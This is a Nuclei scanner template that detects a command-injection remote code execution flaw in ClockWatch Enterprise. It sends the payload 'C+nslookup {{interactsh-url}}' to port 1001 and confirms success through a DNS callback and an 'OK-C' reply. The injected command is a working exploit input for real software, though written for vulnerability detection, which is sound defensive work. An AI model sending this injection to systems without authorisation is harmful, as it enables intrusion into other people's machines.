id: clockwatch-enterprise-rce

info:
  name: ClockWatch Enterprise - Remote Code Execution
  author: gy741
  severity: critical
  description: |
    ClockWatch Enterprise is susceptible to remote code execution.
  reference:
    - https://blog.grimm-co.com/2021/07/old-dog-same-tricks.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10.0
    cwe-id: CWE-77
  tags: clockwatch,rce,network

network:
  - inputs:
      - data: "C+nslookup {{interactsh-url}}"

    host:
      - "{{Hostname}}"
      - "{{Host}}:1001"

    matchers-condition: and
    matchers:

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        words:
          - "OK-C"

# Enhanced by mp on 2022/05/27
